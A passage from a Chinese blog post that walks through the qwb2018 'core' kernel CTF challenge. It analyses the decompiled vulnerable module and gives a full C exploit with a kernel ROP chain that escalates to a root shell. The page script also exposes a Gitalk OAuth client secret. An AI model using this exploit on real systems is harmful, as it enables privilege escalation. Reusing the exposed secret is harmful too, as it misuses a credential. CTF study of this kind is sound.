class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>core_write</code> 向 bss 写入最多 0x800 字节</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">core_ioctl</span><span class="params">(__int64 fd, <span class="type">int</span> choice, __int64 value)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">switch</span> ( choice )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0x6677889B</span>:</span><br><span class="line">      core_read(value);</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0x6677889C</span>:</span><br><span class="line">      printk(&amp;unk_2CD);</span><br><span class="line">      off = value;</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0x6677889A</span>:</span><br><span class="line">      printk(&amp;unk_2B3);</span><br><span class="line">      core_copy_func(value);</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>core_ioctl</code> 可调用 <code>core_read</code>、<code>core_copy_func</code> 函数，且可以设置全局变量 off 的值</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 __fastcall <span class="title function_">core_read</span><span class="params">(__int64 addr_user)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> *v2; <span class="comment">// rdi</span></span><br><span class="line">  __int64 i; <span class="comment">// rcx</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 result; <span class="comment">// rax</span></span><br><span class="line">  <span class="type">char</span> buf[<span class="number">64</span>]; <span class="comment">// [rsp+0h] [rbp-50h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v6; <span class="comment">// [rsp+40h] [rbp-10h]</span></span><br><span class="line"></span><br><span class="line">  v6 = __readgsqword(<span class="number">0x28</span>u);</span><br><span class="line">  printk(&amp;unk_25B);</span><br><span class="line">  printk(&amp;unk_275);</span><br><span class="line">  v2 = buf;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">16LL</span>; i; --i )</span><br><span class="line">  &#123;</span><br><span class="line">    *(_DWORD *)v2 = <span class="number">0</span>;</span><br><span class="line">    v2 += <span class="number">4</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">strcpy</span>(buf, <span class="string">&quot;Welcome to the QWB CTF challenge.\n&quot;</span>);</span><br><span class="line">  result = copy_to_user(addr_user, &amp;buf[off], <span class="number">64LL</span>);</span><br><span class="line">  <span class="keyword">if</span> ( !result )</span><br><span class="line">    <span class="keyword">return</span> __readgsqword(<span class="number">0x28</span>u) ^ v6;</span><br><span class="line">  __asm &#123; swapgs &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>core_read</code> 复制栈中 64 字节到用户进程空间，由于 off 可控，可以用来泄露地址和 canary</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">core_copy_func</span><span class="params">(__int64 size)</span></span><br><span class="line">&#123;</span><br><span class="line">  __int64 result; <span class="comment">// rax</span></span><br><span class="line">  <span class="type">char</span> v2[<span class="number">64</span>]; <span class="comment">// [rsp+0h] [rbp-50h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v3; <span class="comment">// [rsp+40h] [rbp-10h]</span></span><br><span class="line"></span><br><span class="line">  v3 = __readgsqword(<span class="number">0x28</span>u);</span><br><span class="line">  printk(&amp;unk_215);</span><br><span class="line">  <span class="keyword">if</span> ( size &gt; <span class="number">63</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    printk(&amp;unk_2A1);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0xFFFFFFFF</span>LL;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    result = <span class="number">0LL</span>;</span><br><span class="line">    qmemcpy(v2, &amp;name, (<span class="type">unsigned</span> __int16)size);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>core_copy_func</code> 传入一个 64 位大小的 size，复制 bss 上的数据到栈中</p>
<p>size 有检查，但是最后取 size 的低 16 位，传入一个合适负数就可以最多复制 0xffff 字节的 bss 到栈中，导致栈溢出，进行 ROP</p>
<h3 id="漏洞利用-ROP"><a href="#漏洞利用-ROP" class="headerlink" title="漏洞利用 ROP"></a>漏洞利用 ROP</h3><p>漏洞利用已经很明了</p>
<ul>
<li><code>core_read</code> 可以溢出读栈，拿到 canary 和基址<ul>
<li>这里提一嘴，才知道 canary 是一个线程一个，之前以为一个函数一个，一直没想出来怎么做😇</li>
</ul>
</li>
<li><code>core_copy_func</code> 可以溢出写栈，进行 ROP</li>
</ul>
<p>思路</p>
<ol>
<li>读取 kallsyms 获取 <code>prepare_kernel_cred</code> 和 <code>commit_creds</code> 的函数地址</li>
<li>通过 <code>core_read</code> 获取 canary 和基址</li>
<li>通过 <code>core_write</code> 写 ROP 链到 bss</li>
<li>通过 <code>core_copy_func</code> 复制 ROP 链栈溢出</li>
</ol>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight c"><figcaption><span>exp.c</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;../mypwn.h&quot;</span></span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> iretq 0xffffffff81050ac2 + offset</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> swapgs_popfq_ret 0xffffffff81a012da + offset</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> pop_rdi_ret 0xffffffff81000b2f + offset</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> mov_rdi_rax_jmp_rdx 0xffffffff8106a6d2 + offset</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> pop_rdx_ret 0xffffffff810a0f49 + offset</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> swapgs_restore_ret</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> mov_cr4_rdi_push_rdx_popfq_ret 0xffffffff81075014 + offset</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> READ 0x6677889B</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> OFF 0x6677889C</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> COPY_FUNC 0x6677889A</span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">core_read</span><span class="params">(<span class="type">int</span> fd, <span class="type">char</span> *buf)</span> &#123;</span><br><span class="line">    ioctl(fd, READ, buf);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">core_set_off_val</span><span class="params">(<span class="type">int</span> fd, <span class="type">size_t</span> off)</span> &#123;</span><br><span class="line">    ioctl(fd, OFF, off);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">core_copy_func</span><span class="params">(<span class="type">int</span> fd, <span class="type">size_t</span> len)</span> &#123;</span><br><span class="line">    ioctl(fd, COPY_FUNC, len);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">long</span> addr, offset, canary;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">long</span> rop_chain[<span class="number">0x100</span>];</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> buf[<span class="number">0x300</span>];</span><br><span class="line">    <span class="type">char</span> type[<span class="number">0x10</span>];</span><br><span class="line"></span><br><span class="line">    myLog(<span class="string">&quot;Start to pwn kernel&quot;</span>);</span><br><span class="line">    save_status();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Get canary &amp; prepare_kernel_cred &amp; commit_creds from kallsyms</span></span><br><span class="line">    get_privilege_addr(<span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">    offset = commit_creds - <span class="number">0xffffffff8109c8e0</span>;</span><br><span class="line">    myLog(<span class="string">&quot;Get offset: %p&quot;</span>, offset);</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> fd = open(<span class="string">&quot;/proc/core&quot;</span>, O_RDWR);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Get canary</span></span><br><span class="line">    core_set_off_val(fd, <span class="number">64</span>);</span><br><span class="line">    core_read(fd, buf);</span><br><span class="line">    canary = ((<span class="type">unsigned</span> <span class="type">long</span> *)buf)[<span class="number">0</span>];</span><br><span class="line">    myLog(<span class="string">&quot;Get canary: %p&quot;</span>, canary);</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line">    <span class="keyword">for</span>(i = <span class="number">0</span>; i &lt; <span class="number">10</span>; i++)</span><br><span class="line">        rop_chain[i] = canary;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/// ROP!</span></span><br><span class="line">    rop_chain[i++] = pop_rdi_ret;</span><br><span class="line">    rop_chain[i++] = <span class="number">0</span>;</span><br><span class="line">    rop_chain[i++] = prepare_kernel_cred;</span><br><span class="line">    rop_chain[i++] = pop_rdx_ret;</span><br><span class="line">    rop_chain[i++] = commit_creds;</span><br><span class="line">    rop_chain[i++] = mov_rdi_rax_jmp_rdx;</span><br><span class="line">    rop_chain[i++] = swapgs_popfq_ret;</span><br><span class="line">    rop_chain[i++] = <span class="number">0</span>;</span><br><span class="line">    rop_chain[i++] = iretq;</span><br><span class="line">    rop_chain[i++] = get_root_shell;</span><br><span class="line">    rop_chain[i++] = user_cs;</span><br><span class="line">    rop_chain[i++] = user_rflags;</span><br><span class="line">    rop_chain[i++] = user_sp;</span><br><span class="line">    rop_chain[i++] = user_ss;</span><br><span class="line"></span><br><span class="line">    write(fd, rop_chain, <span class="number">0x800</span>);</span><br><span class="line">    core_copy_func(fd, <span class="number">0xffffffffffff0000</span> | <span class="number">0x100</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a target="_blank" rel="noopener" href="https://arttnba3.cn/2021/02/22/OS-0X01-LINUX-KERNEL-PART-II/">【OS.0x01】Linux Kernel II：内核简易食用指北</a></p>
<p><a target="_blank" rel="noopener" href="https://arttnba3.cn/2021/03/03/PWN-0X00-LINUX-KERNEL-PWN-PART-I/">【PWN.0x00】Linux Kernel Pwn I：Basic Exploit to Kernel Pwn in CTF</a></p>
<p><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/kernel-mode/basic-knowledge/">https://ctf-wiki.org/pwn/linux/kernel-mode/basic-knowledge/</a></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>Kernel Pwn 入门</p><p><a href="https://humoooor.cn/2023/08/20/Kernel Pwn 入门/">https://humoooor.cn/2023/08/20/Kernel Pwn 入门/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>Humoooor</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2023-08-20</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2023-10-04</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/Linux-Kernel/">Linux Kernel</a></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2023/09/17/Linux%20Kernel%20%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">Linux Kernel 内存管理</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2023/06/05/2023.06/"><span class="level-item">2023.06</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">评论</h3><div id="comment-container"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.css"><script src="https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.min.js"></script><script>var gitalk = new Gitalk({
            id: "08ca88c6595c2006daefca6b2e5aa45b",
            repo: "humoooor.github.io",
            owner: "Humoooor",
            clientID: "2262fbb1802e5dc5cc56",
            clientSecret: "55e61f8ed70fa2bcec90cf254ac1864f21cb350b",
            admin: ["Humoooor"],
            createIssueManually: false,
            distractionFreeMode: false,
            perPage: 10,
            pagerDirection: "last",
            
            
            enableHotKey: true,
            
        })
        gitalk.render('comment-container')</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1 is-sticky"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar" src="/img/MyLogo.jpg" alt="Humoooor"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">Humoooor</p><p class="is-size-6 is-block">Free to Hack</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>China</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives"><p class="title">21</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories"><p class="title">7</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags"><p class="title">10</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/humoooor" target="_blank" rel="noopener">关注我</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/humoooor"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Email" href="mailto:humoooor@qq.com"><i class="fa fa-envelope"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#环境搭建"><span class="level-left"><span class="level-item">1</span><span class="level-item">环境搭建</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#安装一些依赖包"><span class="level-left"><span class="level-item">1.1</span><span class="level-item">安装一些依赖包</span></span></a></li><li><a class="level is-mobile" href="#获取内核镜像"><span class="level-left"><span class="level-item">1.2</span><span class="level-item">获取内核镜像</span></span></a></li><li><a class="level is-mobile" href="#使用-Busybox-构建文件系统"><span class="level-left"><span class="level-item">1.3</span><span class="level-item">使用 Busybox 构建文件系统</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#编译-Busybox"><span class="level-left"><span class="level-item">1.3.1</span><span class="level-item">编译 Busybox</span></span></a></li><li><a class="level is-mobile" href="#构建文件系统"><span class="level-left"><span class="level-item">1.3.2</span><span class="level-item">构建文件系统</span></span></a></li><li><a class="level is-mobile" href="#打包文件系统为镜像文件"><span class="level-left"><span class="level-item">1.3.3</span><span class="level-item">打包文件系统为镜像文件</span></span></a></li><li><a class="level is-mobile" href="#在文件系统中添加或修改文件"><span class="level-left"><span class="level-item">1.3.4</span><span class="level-item">在文件系统中添加或修改文件</span></span></a></li></ul></li><li><a class="level is-mobile" href="#使用-qemu-运行内核"><span class="level-left"><span class="level-item">1.4</span><span class="level-item">使用 qemu 运行内核</span></span></a></li></ul></li><li><a class="level is-mobile" href="#了解-LKM"><span class="level-left"><span class="level-item">2</span><span class="level-item">了解 LKM</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#预备知识"><span class="level-left"><span class="level-item">2.1</span><span class="level-item">预备知识</span></span></a></li><li><a class="level is-mobile" href="#编写一个简单模块"><span class="level-left"><span class="level-item">2.2</span><span class="level-item">编写一个简单模块</span></span></a></li><li><a class="level is-mobile" href="#编译-LKM"><span class="level-left"><span class="level-item">2.3</span><span class="level-item">编译 LKM</span></span></a></li><li><a class="level is-mobile" href="#使用-LKM"><span class="level-left"><span class="level-item">2.4</span><span class="level-item">使用 LKM</span></span></a></li></ul></li><li><a class="level is-mobile" href="#入门题-qwb2018-core"><span class="level-left"><span class="level-item">3</span><span class="level-item">入门题 qwb2018_core</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#查看脚本"><span class="level-left"><span class="level-item">3.1</span><span class="level-item">查看脚本</span></span></a></li><li><a class="level is-mobile" href="#分析-LKM"><span class="level-left"><span class="level-item">3.2</span><span class="level-item">分析 LKM</span></span></a></li><li><a class="level is-mobile" href="#漏洞利用-ROP"><span class="level-left"><span class="level-item">3.3</span><span class="level-item">漏洞利用 ROP</span></span></a></li><li><a class="level is-mobile" href="#exp"><span class="level-left"><span class="level-item">3.4</span><span class="level-item">exp</span></span></a></li></ul></li><li><a class="level is-mobile" href="#参考链接"><span class="level-left"><span class="level-item">4</span><span class="level-item">参考链接</span></span></a></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div><div class="card widget" data-type="archives"><div class="card-content"><div class="menu"><h3 class="menu-label">归档</h3><ul class="menu-list"><li><a class="level is-mobile" href="/archives/2024/"><span class="level-start"><span class="level-item">2024</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile" href="/archives/2023/"><span class="level-start"><span class="level-item">2023</span></span><span class="level-end"><span class="level-item tag">7</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/"><span class="level-start"><span class="level-item">2022</span></span><span class="level-end"><span class="level-item tag">11</span></span></a></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">标签</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/FILE/"><span class="tag">FILE</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Linux-Kernel/"><span class="tag">Linux Kernel</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Memory-Management/"><span class="tag">Memory Management</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Musl-libc/"><span class="tag">Musl libc</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Operating-System/"><span class="tag">Operating System</span><span class="tag">7</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Qemu/"><span class="tag">Qemu</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/RISC-V/"><span class="tag">RISC-V</span><span class="tag">7</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Rust/"><span class="tag">Rust</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Tools/"><span class="tag">Tools</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Xv6/"><span class="tag">Xv6</span><span class="tag">7</span></a></div></div></div></div></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/MyLogo.jpg" alt="Humoooor&#039;s Blog" height="28"></a><p class="is-size-7"><span>&copy; 2024 Humoooor</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/humoooor"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "此网站使用Cookie来改善您的体验。",
          dismiss: "知道了！",
          allow: "允许使用Cookie",
          deny: "拒绝",
          link: "了解更多",
          policy: "Cookie政策",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>